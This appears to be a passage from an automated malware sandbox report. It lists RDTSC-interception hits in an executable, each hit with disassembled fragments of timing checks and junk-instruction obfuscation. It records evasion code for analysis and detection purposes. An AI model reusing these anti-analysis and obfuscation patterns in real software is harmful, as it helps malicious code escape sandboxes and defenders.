                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9D414 second address: A9D418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9E651 second address: A9E655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9E655 second address: A9E662 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA03A7 second address: AA03CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483379h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA03CA second address: AA03F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FD0B5348056h 0x0000000f jmp 00007FD0B534805Fh 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A4E3B6 second address: A4E3BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A4E3BA second address: A4E3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A4E3C0 second address: A4E3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD0B5483373h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A4E3DD second address: A4E3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A4E3E3 second address: A4E3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A4E3E7 second address: A4E432 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348062h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FD0B5348058h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pushad 0x00000013 jo 00007FD0B534805Eh 0x00000019 jne 00007FD0B5348056h 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007FD0B534805Ch 0x00000026 jmp 00007FD0B534805Dh 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A4E432 second address: A4E436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA208E second address: AA2094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA2094 second address: AA20DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movzx edi, dx 0x0000000c push 00000000h 0x0000000e and esi, 5398E801h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FD0B5483368h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 jg 00007FD0B5483366h 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 push edx 0x0000003a jbe 00007FD0B5483366h 0x00000040 pop edx 0x00000041 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA20DE second address: AA20E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA20E3 second address: AA20E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA20E9 second address: AA20F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA2C22 second address: AA2C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA2C28 second address: AA2C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA6105 second address: AA611C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD0B548336Ch 0x00000008 jnc 00007FD0B5483366h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA8B89 second address: AA8B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA8B8E second address: AA8BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0B5483379h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA8BB3 second address: AA8C17 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD0B5348063h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FD0B5348058h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007FD0B5348058h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 push 00000000h 0x00000043 stc 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 pushad 0x00000049 popad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA3E52 second address: AA3E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA8C17 second address: AA8C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA3E58 second address: AA3E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA8DA5 second address: AA8DC9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FD0B5348063h 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FD0B5348056h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA3E5D second address: AA3E8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD0B5483379h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA9B03 second address: AA9B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA9B09 second address: AA9B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA8E6D second address: AA8E8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD0B5348063h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA9B0F second address: AA9B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA9BE4 second address: AA9BEE instructions: 0x00000000 rdtsc 0x00000002 js 00007FD0B534805Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AA9CA5 second address: AA9CAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AABA58 second address: AABA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AAC95B second address: AAC960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AAC960 second address: AAC967 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AAC967 second address: AAC9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FD0B5483368h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jnc 00007FD0B5483368h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FD0B5483368h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 push 00000000h 0x00000046 movzx ebx, dx 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007FD0B548336Dh 0x00000052 jmp 00007FD0B5483376h 0x00000057 popad 0x00000058 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AAC9E9 second address: AAC9FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0B5348058h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AABBAA second address: AABC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 or dword ptr [ebp+122D1B00h], ebx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FD0B5483368h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov ebx, dword ptr [ebp+122D27FAh] 0x0000003b mov eax, dword ptr [ebp+122D10D9h] 0x00000041 mov dword ptr [ebp+1244D2D8h], edi 0x00000047 xor dword ptr [ebp+122D39B3h], edi 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007FD0B5483368h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 0000001Ch 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 movsx edi, ax 0x0000006c nop 0x0000006d jbe 00007FD0B548336Eh 0x00000073 push edx 0x00000074 jp 00007FD0B5483366h 0x0000007a pop edx 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007FD0B5483374h 0x00000083 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AADAE3 second address: AADAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AADAE9 second address: AADAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AADAED second address: AADB6A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD0B5348064h 0x0000000e nop 0x0000000f mov bh, BAh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FD0B5348058h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov edi, esi 0x0000002f push edi 0x00000030 pop edi 0x00000031 push 00000000h 0x00000033 mov di, ax 0x00000036 movsx edi, ax 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b jmp 00007FD0B534805Dh 0x00000040 jmp 00007FD0B534805Fh 0x00000045 popad 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FD0B5348061h 0x0000004e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AAEA7B second address: AAEA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AAEA81 second address: AAEA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AAFB0E second address: AAFB12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AAFB12 second address: AAFB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD0B5348061h 0x0000000e pop edx 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FD0B5348058h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c clc 0x0000002d push 00000000h 0x0000002f xchg eax, esi 0x00000030 jno 00007FD0B5348067h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FD0B534805Fh 0x0000003e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AADCEB second address: AADCF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AADE01 second address: AADE06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB0BA7 second address: AB0BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB0BAB second address: AB0BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB0BB1 second address: AB0C2B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0B5483373h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jc 00007FD0B548336Ch 0x00000013 mov dword ptr [ebp+122D3162h], edi 0x00000019 push 00000000h 0x0000001b cld 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FD0B5483368h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 sub dword ptr [ebp+122D1881h], esi 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 push edx 0x00000041 jmp 00007FD0B5483370h 0x00000046 pop edx 0x00000047 jmp 00007FD0B548336Eh 0x0000004c popad 0x0000004d push eax 0x0000004e push ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AAECC7 second address: AAED3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD0B5348063h 0x0000000a jmp 00007FD0B534805Dh 0x0000000f popad 0x00000010 nop 0x00000011 or dword ptr [ebp+12457612h], edi 0x00000017 push dword ptr fs:[00000000h] 0x0000001e sub dword ptr [ebp+122D234Ch], edx 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007FD0B5348058h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov ebx, dword ptr [ebp+122D2D74h] 0x0000004b sub dword ptr [ebp+122D2016h], eax 0x00000051 mov eax, dword ptr [ebp+122D1091h] 0x00000057 add edi, 675CB583h 0x0000005d push FFFFFFFFh 0x0000005f or dword ptr [ebp+122D17E2h], esi 0x00000065 push eax 0x00000066 push ecx 0x00000067 pushad 0x00000068 push eax 0x00000069 pop eax 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB3CDD second address: AB3D51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FD0B5483368h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 call 00007FD0B548336Dh 0x00000027 sbb bl, FFFFFFF2h 0x0000002a pop ebx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FD0B5483368h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 stc 0x00000048 push 00000000h 0x0000004a mov ebx, 505CC5EEh 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FD0B548336Fh 0x00000059 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB3D51 second address: AB3D5B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB3D5B second address: AB3D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB3D61 second address: AB3D74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FD0B534805Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB3D74 second address: AB3D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB3D78 second address: AB3D7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB0D3B second address: AB0D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB0D40 second address: AB0D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD0B5348056h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB0E32 second address: AB0E38 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB0E38 second address: AB0E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB1DBD second address: AB1DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB1E83 second address: AB1E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AAFD39 second address: AAFD3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB2DEF second address: AB2E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FD0B534805Ch 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov di, EC00h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FD0B5348058h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f jmp 00007FD0B5348061h 0x00000044 mov eax, dword ptr [ebp+122D02F1h] 0x0000004a adc edi, 27E0960Ah 0x00000050 pushad 0x00000051 mov dword ptr [ebp+122D1886h], esi 0x00000057 mov edx, dword ptr [ebp+122D2C68h] 0x0000005d popad 0x0000005e push FFFFFFFFh 0x00000060 push 00000000h 0x00000062 push eax 0x00000063 call 00007FD0B5348058h 0x00000068 pop eax 0x00000069 mov dword ptr [esp+04h], eax 0x0000006d add dword ptr [esp+04h], 00000015h 0x00000075 inc eax 0x00000076 push eax 0x00000077 ret 0x00000078 pop eax 0x00000079 ret 0x0000007a mov dword ptr [ebp+1247DD93h], ecx 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB2E97 second address: AB2E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB2E9B second address: AB2EAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348060h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: AB2EAF second address: AB2EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
